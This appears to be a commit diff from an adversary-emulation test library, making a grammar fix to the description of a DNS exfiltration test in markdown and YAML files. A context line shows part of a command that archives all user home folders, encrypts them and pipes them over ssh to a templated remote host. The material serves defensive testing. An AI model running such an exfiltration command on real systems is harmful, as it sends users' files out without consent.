Update T1048.md (#2806)
* Update T1048.md This is a grammatically correct change. * update yaml --------- Co-authored-by: Hare Sudhan <code@0x6c.dev> Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
@@ -96,7 +96,7 @@ tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{
|
||||
<br/>
|
||||
|
||||
## Atomic Test #3 - DNSExfiltration (doh)
|
||||
DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.
|
||||
DNSExfiltrator enables the transfer (exfiltration) of a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.
|
||||
!!! Test will fail without a domain under your control with A record and NS record !!!
|
||||
See this github page for more details - https://github.com/Arno0x/DNSExfiltrator
|
||||
|
||||
|
||||
@@ -52,7 +52,7 @@ atomic_tests:
|
||||
- name: DNSExfiltration (doh)
|
||||
auto_generated_guid: c943d285-ada3-45ca-b3aa-7cd6500c6a48
|
||||
description: |
|
||||
DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.
|
||||
DNSExfiltrator enables the transfer (exfiltration) of a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.
|
||||
!!! Test will fail without a domain under your control with A record and NS record !!!
|
||||
See this github page for more details - https://github.com/Arno0x/DNSExfiltrator
|
||||
supported_platforms:
|
||||
|
||||
Reference in New Issue
Block a user